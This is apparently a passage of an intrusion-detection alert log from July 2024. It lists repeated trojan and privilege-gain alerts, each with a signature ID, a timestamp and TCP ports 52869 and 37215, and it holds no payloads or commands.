                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.989215
                      SID:2027339
                      Source Port:33870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220817
                      SID:2835222
                      Source Port:48860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:46822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.282556
                      SID:2025132
                      Source Port:45418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.400635
                      SID:2027339
                      Source Port:54792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591324
                      SID:2831300
                      Source Port:43900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.954688
                      SID:2831300
                      Source Port:33416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.475886
                      SID:2025132
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.599458
                      SID:2027339
                      Source Port:44618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.562532
                      SID:2027339
                      Source Port:41584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:53324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:27.457367
                      SID:2831300
                      Source Port:59562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.956473
                      SID:2831300
                      Source Port:35810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.406731
                      SID:2027339
                      Source Port:46448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.243266
                      SID:2025132
                      Source Port:58200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.698636
                      SID:2027339
                      Source Port:41422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.092574
                      SID:2025132
                      Source Port:34552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2835222
                      Source Port:41338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.965816
                      SID:2027339
                      Source Port:56820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633578
                      SID:2829579
                      Source Port:59562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2829579
                      Source Port:49548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221090
                      SID:2835222
                      Source Port:52728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.955471
                      SID:2027339
                      Source Port:46232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.413537
                      SID:2027339
                      Source Port:57454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:32866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.845923
                      SID:2027339
                      Source Port:41810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807274
                      SID:2831300
                      Source Port:53100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.992845
                      SID:2027339
                      Source Port:48958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044538
                      SID:2829579
                      Source Port:58422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:39600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.239928
                      SID:2027339
                      Source Port:41740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.615381
                      SID:2027339
                      Source Port:50648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.374641
                      SID:2027339
                      Source Port:41736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.597058
                      SID:2831300
                      Source Port:58228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.612597
                      SID:2831300
                      Source Port:45456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.751196
                      SID:2025132
                      Source Port:49298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:34972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.447869
                      SID:2027339
                      Source Port:55486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.360754
                      SID:2027339
                      Source Port:54610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2829579
                      Source Port:35306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.318262
                      SID:2027339
                      Source Port:47538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.364263
                      SID:2025132
                      Source Port:47600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.622268
                      SID:2027339
                      Source Port:56800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.813695
                      SID:2027339
                      Source Port:36424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.899168
                      SID:2027339
                      Source Port:36496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.799973
                      SID:2027339
                      Source Port:41598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.499887
                      SID:2025132
                      Source Port:35622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.281138
                      SID:2025132
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.707648
                      SID:2027339
                      Source Port:47876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:57076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313383
                      SID:2027339
                      Source Port:34288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.407048
                      SID:2027339
                      Source Port:34170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.484243
                      SID:2025132
                      Source Port:48602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.550846
                      SID:2027339
                      Source Port:52846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.014835
                      SID:2027339
                      Source Port:55010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.196522
                      SID:2027339
                      Source Port:33358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.345084
                      SID:2027339
                      Source Port:60784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.333817
                      SID:2027339
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.044692
                      SID:2027339
                      Source Port:33658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.562310
                      SID:2025132
                      Source Port:57736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.800757
                      SID:2027339
                      Source Port:36946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2835222
                      Source Port:35822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.887574
                      SID:2027339
                      Source Port:53000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.354566
                      SID:2027339
                      Source Port:48434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:59576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:56590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.219427
                      SID:2027339
                      Source Port:34934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312611
                      SID:2027339
                      Source Port:49188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520226
                      SID:2027339
                      Source Port:52308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.596881
                      SID:2027339
                      Source Port:35476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.707284
                      SID:2025132
                      Source Port:52044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.602822
                      SID:2831300
                      Source Port:33086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2829579
                      Source Port:60850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:56630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.967549
                      SID:2027339
                      Source Port:49624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2835222
                      Source Port:43368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.956472
                      SID:2027339
                      Source Port:41802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.274940
                      SID:2831300
                      Source Port:44924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.994703
                      SID:2027339
                      Source Port:33678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.716125
                      SID:2027339
                      Source Port:36576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.689098
                      SID:2027339
                      Source Port:54750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.308516
                      SID:2027339
                      Source Port:54334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:54082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.827502
                      SID:2831300
                      Source Port:55088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.321965
                      SID:2829579
                      Source Port:42484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2829579
                      Source Port:40688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.407718
                      SID:2027339
                      Source Port:35494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.345401
                      SID:2027339
                      Source Port:44704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.596773
                      SID:2025132
                      Source Port:37872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.719613
                      SID:2027339
                      Source Port:45138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:56536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312895
                      SID:2027339
                      Source Port:50844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.536855
                      SID:2027339
                      Source Port:60226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.252201
                      SID:2025132
                      Source Port:34886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.914703
                      SID:2027339
                      Source Port:42698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.684130
                      SID:2025132
                      Source Port:36606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2829579
                      Source Port:60250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.728248
                      SID:2027339
                      Source Port:37640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.004906
                      SID:2829579
                      Source Port:34768
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321964
                      SID:2829579
                      Source Port:46232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.591520
                      SID:2027339
                      Source Port:53006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.320867
                      SID:2027339
                      Source Port:38554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.735617
                      SID:2835222
                      Source Port:59152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.322736
                      SID:2025132
                      Source Port:55204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.426918
                      SID:2025132
                      Source Port:36142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.970621
                      SID:2831300
                      Source Port:51010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.123155
                      SID:2025132
                      Source Port:46746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.834603
                      SID:2831300
                      Source Port:50948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2835222
                      Source Port:38924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.584506
                      SID:2831300
                      Source Port:57902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:40466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2829579
                      Source Port:48170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.621955
                      SID:2831300
                      Source Port:48784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:46448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.412156
                      SID:2027339
                      Source Port:36990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.088724
                      SID:2027339
                      Source Port:55198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:59334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.470759
                      SID:2027339
                      Source Port:44516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.760231
                      SID:2027339
                      Source Port:52620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.530676
                      SID:2831300
                      Source Port:48422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.482723
                      SID:2025132
                      Source Port:41540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:47164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:33388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.489480
                      SID:2027339
                      Source Port:53146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:55320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.144821
                      SID:2027339
                      Source Port:40362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.632381
                      SID:2025132
                      Source Port:49310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2829579
                      Source Port:39198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.957644
                      SID:2831300
                      Source Port:59666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.503242
                      SID:2027339
                      Source Port:54978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2829579
                      Source Port:50486
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.072080
                      SID:2027339
                      Source Port:56664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.185498
                      SID:2831300
                      Source Port:37436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.275004
                      SID:2027339
                      Source Port:55772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.322405
                      SID:2025132
                      Source Port:49484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.909111
                      SID:2829579
                      Source Port:48624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.937814
                      SID:2835222
                      Source Port:45388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2025132
                      Source Port:33388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.869520
                      SID:2027339
                      Source Port:58910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934684
                      SID:2829579
                      Source Port:56506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.722890
                      SID:2831300
                      Source Port:38548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2829579
                      Source Port:32798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.909668
                      SID:2027339
                      Source Port:42420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.553791
                      SID:2831300
                      Source Port:33484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.288562
                      SID:2831300
                      Source Port:38350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:21.004725
                      SID:2027339
                      Source Port:56508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.041756
                      SID:2027339
                      Source Port:36888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:37624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.180913
                      SID:2025132
                      Source Port:54438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.125263
                      SID:2025132
                      Source Port:57470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.323042
                      SID:2027339
                      Source Port:43226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.101402
                      SID:2027339
                      Source Port:34722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.310941
                      SID:2025132
                      Source Port:34298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.304416
                      SID:2027339
                      Source Port:37654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2829579
                      Source Port:53174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:53958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.366575
                      SID:2027339
                      Source Port:33730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2829579
                      Source Port:50652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.075399
                      SID:2025132
                      Source Port:35962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.323042
                      SID:2027339
                      Source Port:38880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.895586
                      SID:2027339
                      Source Port:52138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.990022
                      SID:2025132
                      Source Port:56464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.035425
                      SID:2025132
                      Source Port:52626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:48558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:42956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.546480
                      SID:2027339
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.901722
                      SID:2025132
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:03.068984
                      SID:2025132
                      Source Port:52552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.267116
                      SID:2831300
                      Source Port:57100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.288586
                      SID:2027339
                      Source Port:33274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.499887
                      SID:2025132
                      Source Port:42864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.786028
                      SID:2027339
                      Source Port:56518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2835222
                      Source Port:40646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2829579
                      Source Port:57286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.474975
                      SID:2025132
                      Source Port:36434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.700029
                      SID:2027339
                      Source Port:44644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.232174
                      SID:2027339
                      Source Port:51510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:55284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.476791
                      SID:2025132
                      Source Port:49842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.890948
                      SID:2025132
                      Source Port:49942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2027339
                      Source Port:48686
